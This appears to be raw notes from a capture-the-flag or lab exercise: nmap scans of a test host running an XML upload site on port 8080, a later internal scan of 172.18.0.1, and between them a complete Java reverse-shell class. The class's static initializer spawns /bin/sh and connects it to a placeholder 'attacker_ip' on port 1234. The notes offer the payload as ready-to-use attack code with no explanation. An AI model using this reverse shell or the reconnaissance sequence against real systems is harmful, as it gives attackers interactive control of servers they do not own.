nmap --min-rate=10000 -p- 10.10.69.42 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 01:26 UTC Nmap scan report for ip-10-10-69-42.eu-west-1.compute.internal (10.10.69.42) Host is up (0.0046s latency). Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (admin-prohibited) PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-proxy MAC Address: 02:48:8D:30:46:3B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
nmap -sT -sC -sV -O -p22,8080 10.10.69.42 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 01:27 UTC Nmap scan report for ip-10-10-69-42.eu-west-1.compute.internal (10.10.69.42) Host is up (0.014s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 3072 d5331f0450a3f89ba5d5551004528369 (RSA) | 256 4a89068b1e23034a7cc4926b0f843ef8 (ECDSA) |_ 256 9e5cdafaae39d1bb7f3d849de9a8c962 (ED25519) 8080/tcp open http-proxy |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8 | <!DOCTYPE html> | <html class="no-js"> | <head> | <link rel="icon" href="/assets/img/favicon.png" type="image/png"> | <link rel="stylesheet" href="/styles.css" type="text/css"> | <script>(function(e,t,n){var r=e.querySelectorAll('html')[0];r.className=r.className.replace(/(^|s)no-js(s|$)/,'$1js$2')})(document,window,0);</script> | <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> | <script src="assets/js/upload.js" defer="defer"></script> | </head> | <body> | <nav><a href="/">HOME</a></nav> | <section> | <div class="no-resize centre"><img src="assets/img/Shaker.png"></div> | class="centre">Welcome to the premier XML shaking website on the market! This site will help you shake up your plain boring XML files by throwing your tags aroun | HTTPOptions: | HTTP/1.1 404 Not Found | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8 | <!DOCTYPE html> | <html> | <head> | <link rel="icon" href="/assets/img/favicon.png" type="image/png"> | <link rel="stylesheet" href="/styles.css" type="text/css"> | </head> | <body> | <nav><a href="/">HOME</a></nav> | <section> | class="page-title">Not Found</h1> | class="centre">The requested content was not found</p> | </section> | <div class="stretcher"></div> | <footer class="hitcount"><span>5 requests have been made to this site! </span></footer> | </body> |_ </html> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.93%I=7%D=12/12%Time=6577B723%P=x86_64-pc-linux-gnu%r(G SF:etRequest,60F,"HTTP/1\.1\x20200\x20OK\r\nTransfer-Encoding:\x20chunked\ SF:r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\n5ac\r\n<!DOCTYPE SF:\x20html>\n<html\x20class=\"no-js\">\n\x20\x20<head>\n\x20\x20\x20\x20< SF:link\x20rel=\"icon\"\x20href=\"/assets/img/favicon\.png\"\x20type=\"ima SF:ge/png\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/style SF:s\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x20<script>\(function\(e,t SF:,n\){var\x20r=e\.querySelectorAll\('html'\)\[0\];r\.className=r\.classN SF:ame\.replace\(/\(\^\|\\s\)no-js\(\\s\|\$\)/,'\$1js\$2'\)}\)\(document,w SF:indow,0\);</script>\n\x20\x20\x20\x20<script\x20src=\"https://cdnjs\.cl SF:oudflare\.com/ajax/libs/jquery/3\.6\.0/jquery\.min\.js\"></script>\n\x2 SF:0\x20\x20\x20<script\x20src=\"assets/js/upload\.js\"\x20defer=\"defer\" SF:></script>\n\x20\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<nav><a\x2 SF:0href=\"/\">HOME</a></nav>\n\x20\x20\x20\x20<section>\n\x20\x20\x20\x20 SF:\x20\x20<div\x20class=\"no-resize\x20centre\"><img\x20src=\"assets/img/ SF:Shaker\.png\"></div>\n\x20\x20\x20\x20\x20\x20<p\x20class=\"centre\">We SF:lcome\x20to\x20the\x20premier\x20XML\x20shaking\x20website\x20on\x20the SF:\x20market!\x20This\x20site\x20will\x20help\x20you\x20shake\x20up\x20yo SF:ur\x20plain\x20boring\x20XML\x20files\x20by\x20throwing\x20your\x20tags SF:\x20aroun")%r(HTTPOptions,25F,"HTTP/1\.1\x20404\x20Not\x20Found\r\nTran SF:sfer-Encoding:\x20chunked\r\nContent-Type:\x20text/html;\x20charset=UTF SF:-8\r\n\r\n1f5\r\n<!DOCTYPE\x20html>\n<html>\n\x20\x20<head>\n\x20\x20\x SF:20\x20<link\x20rel=\"icon\"\x20href=\"/assets/img/favicon\.png\"\x20typ SF:e=\"image/png\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\ SF:"/styles\.css\"\x20type=\"text/css\">\n\x20\x20</head>\n\x20\x20<body>\ SF:n\x20\x20\x20\x20<nav><a\x20href=\"/\">HOME</a></nav>\n\x20\x20\x20\x20 SF:<section>\n\x20\x20\x20\x20\x20\x20<h1\x20class=\"page-title\">Not\x20F SF:ound</h1>\n\x20\x20\x20\x20\x20\x20<p\x20class=\"centre\">The\x20reques SF:ted\x20content\x20was\x20not\x20found</p>\n\x20\x20\x20\x20</section>\n SF:\x20\x20\x20\x20<div\x20class=\"stretcher\"></div>\n\x20\x20\x20\x20<fo SF:oter\x20class=\"hitcount\"><span>5\x20requests\x20have\x20been\x20made\ SF:x20to\x20this\x20site!\x20</span></footer>\n\x20\x20</body>\n</html>\n\ SF:r\n0\r\n\r\n"); MAC Address: 02:48:8D:30:46:3B (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|specialized Running (JUST GUESSING): Linux 3.X (98%), Crestron 2-Series (90%) OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:crestron:2_series Aggressive OS guesses: Linux 3.10 - 3.13 (98%), Linux 3.8 (92%), Crestron XPanel control system (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 77.16 seconds
public class Exploit { static { String host = "attacker_ip"; int port = 1234; String cmd = "/bin/sh"; try { Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s = new Socket(host, port); InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); OutputStream po = p.getOutputStream(), so = s.getOutputStream(); while (!s.isClosed()) { while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read()); while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e) {} } p.destroy(); s.close(); } catch (Exception e) {} } }
./nmap -p- 172.18.0.1 Unable to find nmap-services! Resorting to /etc/services
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-15 15:04 UTC Cannot find nmap-payloads. UDP payloads are disabled. Nmap scan report for ip-172-18-0-1.eu-west-1.compute.internal (172.18.0.1) Host is up (0.0037s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-alt 8888/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds